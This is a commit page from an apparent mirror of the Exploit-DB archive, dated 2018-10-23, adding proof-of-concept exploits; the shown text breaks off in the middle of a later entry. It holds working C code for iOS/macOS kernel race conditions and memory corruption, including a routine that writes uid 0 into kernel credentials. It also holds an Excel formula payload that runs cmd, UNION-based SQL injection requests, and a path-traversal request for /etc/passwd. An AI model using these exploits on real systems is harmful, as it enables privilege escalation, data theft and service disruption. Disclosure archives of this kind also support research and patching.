bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-10-23

Browse source 
17 changes to exploits/shellcodes

Modbus Poll 7.2.2 - Denial of Service (PoC)
AudaCity 2.3 - Denial of Service (PoC)
Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking
Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem
Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value
Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory
Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport
Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas

Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)

Countly - Persistent Cross-Site Scripting
Countly - Cross-Site Scripting
MySQL Edit Table 1.0 - 'id' SQL Injection
School ERP Ultimate 2018 - Arbitrary File Download
Oracle Siebel CRM 8.1.1 - CSV Injection
The Open ISES Project 3.30A - 'tick_lat' SQL Injection
School ERP Ultimate 2018 - 'fid' SQL Injection
eNdonesia Portal 8.7 - 'artid' SQL Injection
The Open ISES Project 3.30A - Arbitrary File Download
Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection
This commit is contained in:
Offensive Security 2018-10-23 05:01:48 +00:00
parent 60464134cb
commit defa138d04
18 changed files with 1727 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

58
exploits/ios/dos/45649.txt Normal file
View file

@ -0,0 +1,58 @@
Here's a code snippet from sleh.c with the second level exception handler for undefined instruction exceptions:
static void
handle_uncategorized(arm_saved_state_t *state, boolean_t instrLen2)
{
exception_type_t exception = EXC_BAD_INSTRUCTION;
mach_exception_data_type_t codes[2] = {EXC_ARM_UNDEFINED};
mach_msg_type_number_t numcodes = 2;
uint32_t instr; <------ (a)
if (instrLen2) {
uint16_t instr16;
COPYIN(get_saved_state_pc(state), (char *)&instr16, sizeof(instr16));
instr = instr16;
} else {
COPYIN(get_saved_state_pc(state), (char *)&instr, sizeof(instr)); <------- (b)
}
....
else {
codes[1] = instr; <------ (c)
}
}
exception_triage(exception, codes, numcodes); <-------- (d)
At (a) the uint32_t instr is declared uninitialized on the stack.
At (b) the code tries to copyin the bytes of the exception-causing instruction from userspace
note that the COPYIN macro doesn't itself check the return value of copyin, it just calls it.
At (c) instr is assigned to codes[1], which at (d) is passed to exception_triage.
that codes array will eventually end up being sent in an exception mach message.
The bug is that we can force copyin to fail by unmapping the page containing the undefined instruction
while it's being handled. (I tried to do this with XO memory but the kernel seems to be able to copyin that just fine.)
This PoC has an undefined instruction (0xdeadbeef) on its own page and spins up a thread to keep
switching the protection of that page between VM_PROT_NONE and VM_PROT_READ|VM_PROT_EXECUTE.
We then keep spinning up threads which try to execute that undefined instruction.
If the race windows align the thread executes the undefined instruction but when the sleh code tries to copyin
the page is unmapped, the copying fails and the exception message we get has stale stack memory.
This PoC just demonstrates that you do get values which aren't 0xdeadbeef in there for the EXC_ARM_UNDEFINED type.
You'd have to do a bit more fiddling to work out how to get something specific there.
Note that there are lots of other unchecked COPYIN's in sleh.c (eg when userspace tries to access a system register not allowed
for EL0) and these seem to have the same issue.
tested on iPod Touch 6g running 11.3.1, but looking at the kernelcache it seems to still be there in iOS 12.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45649.zip

171
exploits/ios/dos/45652.c Normal file
View file

@ -0,0 +1,171 @@
/*
There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient:
In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail:
error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id));
if (error)
goto out_error;
This jumps here:
if (persona)
persona_put(persona);
At this point the persona is actually in the global list and the reference has been transfered there; this code
is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id.
The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another),
causing an extra call to persona_put.
It's probably possible to make the failing copyout take a long time,
allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type.
This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln
is still there, but I cannot test it.
It should be easy to fix up this PoC to run as root in your testing environment.
*/
// @i41nbeer
#include "test_next_exploit.h"
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include "kmem.h"
/*
iOS kernel UaF due to bad error handling in personas
There was recently some cleanup in the persona code to fix some race conditions there, I don't think it was sufficient:
In kpersona_alloc_syscall if we provide an invalid userspace pointer for the ipd outptr we can cause this copyout to fail:
error = copyout(&persona->pna_id, idp, sizeof(persona->pna_id));
if (error)
goto out_error;
This jumps here:
if (persona)
persona_put(persona);
At this point the persona is actually in the global list and the reference has been transfered there; this code
is mistakenly assuming that userspace can't still race a dealloc call because it doesn't know the id.
The id is attacker controlled so it's easy to still race this (ie we call persona_alloc in one thread, and dealloc in another),
causing an extra call to persona_put.
It's probably possible to make the failing copyout take a long time,
allowing us to gc and zone-swap the page leading to the code attempting to drop a ref on a different type.
This PoC has been tested on iOS 11.3.1 because it requires root. I have taken a look at an iOS 12 beta and it looks like the vuln
is still there, but I cannot test it.
It should be easy to fix up this PoC to run as root in your testing environment.
*/
#define NGROUPS 16
#define MAXLOGNAME 255
struct kpersona_info {
uint32_t persona_info_version;
uid_t persona_id; /* overlaps with UID */
int persona_type;
gid_t persona_gid;
uint32_t persona_ngroups;
gid_t persona_groups[NGROUPS];
uid_t persona_gmuid;
char persona_name[MAXLOGNAME+1];
/* TODO: MAC policies?! */
};
enum {
PERSONA_INVALID = 0,
PERSONA_GUEST = 1,
PERSONA_MANAGED = 2,
PERSONA_PRIV = 3,
PERSONA_SYSTEM = 4,
PERSONA_TYPE_MAX = PERSONA_SYSTEM,
};
#define PERSONA_OP_ALLOC 1
#define PERSONA_OP_DEALLOC 2
#define PERSONA_OP_GET 3
#define PERSONA_OP_INFO 4
#define PERSONA_OP_PIDINFO 5
#define PERSONA_OP_FIND 6
#define PERSONA_INFO_V1 1
#define PERSONA_SYSCALL_NUMBER 494
int sys_persona(uint32_t operation, uint32_t flags, struct kpersona_info *info, uid_t *id, size_t *idlen) {
return syscall(PERSONA_SYSCALL_NUMBER, operation, flags, info, id, idlen);
}
void persona_dealloc() {
uid_t uid = 235;
size_t uid_size = sizeof(uid);
int perr = sys_persona(PERSONA_OP_DEALLOC, 0, NULL, &uid, &uid_size);
printf("dealloc perr: 0x%x\n", perr);
}
void* persona_bad_alloc() {
// let's try to alloc a persona:
struct kpersona_info info = {0};
uid_t kpersona_uid = -123;
size_t kpersona_uid_size = sizeof(kpersona_uid);
info.persona_info_version = PERSONA_INFO_V1;
strcpy(info.persona_name, "a_name2");
info.persona_id = 235;
info.persona_type = PERSONA_GUEST;
int perr = sys_persona(PERSONA_OP_ALLOC, 0, &info, NULL/*&kpersona_uid*/, &kpersona_uid_size);
printf("err: %x\n", perr);
printf("kpersona_uid: %d\n", kpersona_uid);
return NULL;
}
void* dealloc_thread_func(void* arg) {
int uid = getuid();
printf("dealloc thread uid: %d\n", uid);
// got r00t?
while(1) {
persona_dealloc();
}
}
void* alloc_thread_func(void* arg) {
int uid = getuid();
printf("alloc_thread uid: %d\n", uid);
// got r00t?
while(1) {
persona_bad_alloc();
}
}
void go(uint64_t thread_t) {
uint64_t bsd_thread_info = rk64(thread_t + 0x388);
uint64_t cred_t = rk64(bsd_thread_info + 0x160);
// uid:=0
wk32(cred_t+0x18, 0);
wk32(cred_t+0x1c, 0);
pthread_t dealloc_thread;
pthread_create(&dealloc_thread, NULL, dealloc_thread_func, NULL);
pthread_t alloc_thread;
pthread_create(&alloc_thread, NULL, alloc_thread_func, NULL);
pthread_join(dealloc_thread, NULL);
}

42
exploits/java/webapps/45643.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Oracle Siebel CRM 8.1.1 - CSV Injection
# Date: 2018-10-21
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Vendor Homepage: www.oracle.com
# Software Link: http://www.oracle.com/us/products/applications/siebel/siebel-crm-8-1-1-066196.html
# Version: Oracle Siebel CRM Version 8.1.1 and below
# PoC Exploit: CSV Injection
# Vulnerable URL: All CSV Export functionalities within the CRM application
# Description: Siebel CRM application was found to be vulnerable to Excel Macro injection vulnerability,
# in places where user input is allowed (in text form) and the input can then be exported in CSV
# form. An attacker can change user information to include in his input a malicious excel function.
=-2+3+cmd|' /C calc'!D
# The function will then be executed on the victims machine,
# once the victim exports the details in CSV format and opens the exported file in Microsoft Excel.
# Impact: The vulnerability doesnt target the web application but rather its users.
# A hypothetical attacker could use it, in order to trick other application users into unwillingly
# executing arbitrary malicious code, potentially leading to full a compromise of their workstation.
# Although excel has implemented certain features to protect its users
# (the user is asked whether he wants to execute a potentially harmful external script),
# the user could easily assume that the content can be trusted since the file is
# extracted from a trusted source.
# Solution: Disable CSV export in all list applets and where CSV export is available.
# https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html#c_Patch_Management_ai1029938a
########################################
# Vulnerability Disclosure Timeline:
2017-November-20: Discovered vulnerability
2017-November-23: Vendor Notification
2017-November-29: Vendor Response/Feedback
2018-October-04: Vendor Fix/Patch/Workaround
2018-October-21: Public Disclosure
########################################
Warm regards,
Sarath Nair

245
exploits/macos/dos/45647.c Normal file
View file

@ -0,0 +1,245 @@
/*
This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.)
That report showed the bug in the unmap_user_memory external methods; a variant also exists
in the map_user_memory external methods.
The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe.
map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees)
tested on MacOS 10.13.5 (17F77) on MacBookPro10,1
*/
//ianbeer
// build: clang -o ig_gl_unmap_racer ig_gl_unmap_racer.c -framework IOKit
#if 0
UaF/Double-delete due to bad locking in Apple Intel GPU driver
This PoC file might look familiar; this bug is a trivial variant of CVE-2016-1744 (Apple bug id 635599405.)
That report showed the bug in the unmap_user_memory external methods; a variant also exists
in the map_user_memory external methods.
The intel graphics drivers have their own hash table type IGHashTable which isn't thread-safe.
map_user_memory manipulates an IGHashTable without locking leading to memory issues (eg UaFs and/or double-frees)
tested on MacOS 10.13.5 (17F77) on MacBookPro10,1
#endif
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <IOKit/IOKitLib.h>
struct mem_desc {
uint64_t ptr;
uint64_t size;
};
uint64_t map_user_memory(mach_port_t conn) {
kern_return_t err;
void* mem = malloc(0x20000);
// make sure that the address we pass is page-aligned:
mem = (void*) ((((uint64_t)mem)+0x1000)&~0xfff);
printf("trying to map user pointer: %p\n", mem);
uint64_t inputScalar[16] = {0};
uint64_t inputScalarCnt = 0;
char inputStruct[4096] = {0};
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[4096] = {0};
size_t outputStructCnt = 0;
inputScalarCnt = 0;
inputStructCnt = 0x10;
outputScalarCnt = 4096;
outputStructCnt = 16;
struct mem_desc* md = (struct mem_desc*)inputStruct;
md->ptr = (uint64_t)mem;
md->size = 0x1000;
err = IOConnectCallMethod(
conn,
0x200, // IGAccelGLContext::map_user_memory
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
//return 0;
} else{
printf("worked? outputScalarCnt = %d\n", outputScalarCnt);
}
printf("outputScalarCnt = %d\n", outputScalarCnt);
md = (struct mem_desc*)outputStruct;
printf("0x%llx :: 0x%llx\n", md->ptr, md->size);
return (uint64_t)mem;
}
uint64_t unmap_user_memory(mach_port_t conn, uint64_t handle) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputScalarCnt = 0;
inputStructCnt = 0x8;
outputScalarCnt = 4096;
outputStructCnt = 16;
*((uint64_t*)inputStruct) = handle;
err = IOConnectCallMethod(
conn,
0x201, // IGAccelGLContext::unmap_user_memory
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
volatile mach_port_t gl_context = MACH_PORT_NULL;
#define N_HANDLES 40
void go(void* arg){
while (1) {
uint64_t handles[N_HANDLES] = {0};
for (int i = 0; i < N_HANDLES; i++) {
handles[i] = map_user_memory(gl_context);
}
for (int i = 0; i < N_HANDLES; i++) {
unmap_user_memory(gl_context, handles[i]);
}
}
}
int main(int argc, char** argv){
// get an IGAccelGLContext
gl_context = get_user_client("IntelAccelerator", 1);
printf("gl_context: %x\n", gl_context);
// get a IGAccelSharedUserClient
mach_port_t shared = get_user_client("IntelAccelerator", 6);
printf("shared: %x\n", shared);
// connect the gl_context to the shared UC so we can actually use it:
kern_return_t err = IOConnectAddClient(gl_context, shared);
if (err != KERN_SUCCESS){
printf("IOConnectAddClient error: %x\n", err);
return 0;
}
printf("added client to the shared UC\n");
#define N_THREADS 2
pthread_t threads[N_THREADS];
for (int i = 0; i < N_THREADS; i++) {
pthread_create(&threads[i], NULL, go, NULL);
}
pthread_join(threads[0], NULL);
return 0;
}

36
exploits/multiple/dos/45648.txt Normal file
View file

@ -0,0 +1,36 @@
io_hideventsystem is a MIG service which provides proxy access to various HID devices for untrusted
clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is
in IOKit.framework.
I, and also pangu jailbreak team, had previously found a few bugs in the kernel IODataQueue code.
It seems that io_hideventsystem also uses IODataQueues purely in userspace. That is, via shared
memory between two userspace processes rather than between a userspace process and the kernel.
It turns out that the userspace code for enqueuing and dequeuing from an IODataQueue has none
of the hardening that the kernel code now has, so it's trivial to just replace the length, head
and tail fields (which are in a header at the start of the shared memory buffer) such that
the remote process tries to enqueue outside of the bounds of the IODataQueue's actual backing
buffer.
This is a very basic PoC thrown together to minimally repro the issue.
Run build.sh and run.sh, use the mouse a bit and notice the hidd crash log. Don't try to attach lldb to hidd, you will
struggle to interact with it!
Specifically the server will allocate a buffer wrapped by a mach port (via mach_make_memory_entry_64)
then in the client you can see inside IOHIDEventQueueCreateWithVM the port's memory being mapped.
The attached dylib just interposes mach_vm_map to replace the size and tail fields once the shared
memory is mapped in the client.
I've also tested this on iOS just manually manipulating the shared memory after it's mapped.
Depending on how clients use io_hideventsystem it might be possible to hop first in to backboardd
then in to another client (if that client is also enqueuing events into a queue) but that will
take some more research.
Tested on MacOS 10.13.6 and iOS 11.3.1 (that's the highest version I have on a device with me right now.)
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45648.zip

16
exploits/multiple/dos/45650.txt Normal file
View file

@ -0,0 +1,16 @@
io_hideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts
a mach message which it sends whenever it wants to notify a client that there's data available
in the queue.
As a client we can modify this mach message such that the server (hidd on MacOS, backboardd on iOS)
will send us an arbitrary mach port from its namespace with an arbitrary disposition.
This is a minimal PoC to demonstrate the issue. Interpose it in to the PoC for P0 1623, Apple issue 695930632
Attaching two PoCS:
deja-xnu: exploit for this issue on iOS 11.4.1 to get code execution as backboardd, and then trigger p0 issue 1658
dq8: exploit for this issue, and a new exploit for the original pangu variant of this issue to get a real tfp0 on iOS 7.1.2
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45650.zip

230
exploits/multiple/dos/45651.c Normal file
View file

@ -0,0 +1,230 @@
/*
IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method,
which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods.
I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866)
IOHIDResourceQueue::enqueueReport has basically the same bug:
Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report)
{
UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader);
UInt32 reportSize = report ? (UInt32)report->getLength() : 0;
UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a)
UInt32 head;
UInt32 tail;
UInt32 newTail;
const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
IODataQueueEntry * entry;
// Force a single read of head and tail
head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED);
tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED);
if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b)
{
return false;
}
if ( tail >= head )
{
// Is there enough room at the end for the entry?
if ((getQueueSize() - tail) >= entrySize )
{
entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
entry->size = dataSize;
bcopy(header, &entry->data, headerSize);
if ( report )
report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c)
Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion
of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a)
giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c)
for the actually memory write operation.
The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one
of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these.
A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards,
so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.)
You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example
from the IOHIDFamily code, giving it the correct entitlement and running it.
*/
// @i41nbeer
/*
iOS/MacOS kernel memory corruption due to integer overflow in IOHIDResourceQueue::enqueueReport
IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method,
which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods.
I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866)
IOHIDResourceQueue::enqueueReport has basically the same bug:
Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report)
{
UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader);
UInt32 reportSize = report ? (UInt32)report->getLength() : 0;
UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a)
UInt32 head;
UInt32 tail;
UInt32 newTail;
const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
IODataQueueEntry * entry;
// Force a single read of head and tail
head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED);
tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED);
if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b)
{
return false;
}
if ( tail >= head )
{
// Is there enough room at the end for the entry?
if ((getQueueSize() - tail) >= entrySize )
{
entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
entry->size = dataSize;
bcopy(header, &entry->data, headerSize);
if ( report )
report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c)
Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion
of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a)
giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c)
for the actually memory write operation.
The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one
of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these.
A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards,
so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.)
You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example
from the IOHIDFamily code, giving it the correct entitlement and running it.
Tested on MacOS 10.13.6 (17G65)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
int main(int argc, char** argv){
printf("pid: %d\n", getpid());
kern_return_t err;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got client\n");
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
// open
inputScalar[0] = 0;
inputScalarCnt = 1;
err = IOConnectCallMethod(
conn,
1,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
return 0;
}
printf("called external method open\n");
mach_vm_address_t addr = 0x4100000000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0);
if (err != KERN_SUCCESS){
printf("IOConnectMapMemory failed:0x%x\n", err);
return 0;
}
printf("mapped queue memory here: %016llx\n", addr);
char* buf = malloc(0x100000000);
memset(buf, 'A', 0x100000000);
inputScalar[0] = 0x0;
inputScalar[1] = 0x0;
inputScalarCnt = 3;
outputScalarCnt = 0;
err = IOConnectCallMethod(
conn,
13, // setreport
inputScalar,
inputScalarCnt,
buf,
0xffffffff,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
return 0;
}
return 0;
}

78
exploits/php/webapps/45639.txt Normal file
View file

@ -0,0 +1,78 @@
# Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.bookman.nl
# Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL]
# function edit_rec() {
# if (isset ($_GET['id'])) $in_id = $_GET['id'];
# if ($_GET['mte_a'] == 'edit') $edit=1;
# else $edit = 0;
# $count_required = 0;
# $rows = '';
# $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`");
GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:34:58 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT
Content-Length: 3642
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/example.php?mte_a=del&id=[SQL]
#
# function del_rec() {
# $in_id = $_GET['id'];
# if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) {
# $this->content_deleted = "
GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT
HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:38:18 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT
Content-Length: 1046
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

64
exploits/php/webapps/45642.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: School ERP Ultimate 2018 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://freeschoolerp.com/
# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip
# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download
# Version: 2018
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/student_staff/download.php?document=[FILE]
# http://localhost/[PATH]/office_admin/download.php?document=[FILE]
#
# /[PATH]/student_staff/download.php
# /[PATH]/office_admin/download.php
# ....
# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
# $file = $_REQUEST['document'];
# header("Content-type: application/force-download");
# header("Content-Transfer-Encoding: Binary");
# header("Content-length: ".filesize($file));
# header("Content-disposition: attachment; filename=\"".$file."\"");
# readfile($file);
# exit;
# }
# ....
GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:30:01 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="download.php"
Content-Length: 337
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:31:34 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="../../../../../etc/passwd"
Content-Length: 46368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download

184
exploits/php/webapps/45645.txt Normal file
View file

@ -0,0 +1,184 @@
# Exploit Title: The Open ISES Project 3.30A - 'tick_lat' SQL Injection
# Dork: N/A
